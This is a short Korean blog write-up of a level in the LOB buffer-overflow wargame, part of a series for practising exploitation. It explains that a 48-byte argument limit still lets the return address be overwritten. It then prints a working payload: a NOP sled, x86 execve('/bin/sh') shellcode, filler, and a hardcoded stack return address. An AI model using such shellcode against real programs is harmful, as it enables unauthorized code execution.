반응형
이번에는 argv[1]을 48까지 한정하지만
ret을 모두 덮는데 48바이트만 필요하므로 상관이 없습니다.
Shellcode[40]+sfp+ret
으로 argv[1]에다 넣어주면 됩니다.
PayLoad
`python -c 'print "\x90"*16+"\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f
\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
+"AAAA"+"\x06\xfc\xff\xbf"'`
'Pwnable > LOB' 카테고리의 다른 글
| LOB 5. Orc (0) | 2015.09.23 |
|---|---|
| LOB 4. Goblin (0) | 2015.09.20 |
| LOB 3. Cobolt (0) | 2015.09.17 |
| LOB 2. Gremlin (0) | 2015.09.12 |
| LOB 1. Gate (0) | 2015.09.08 |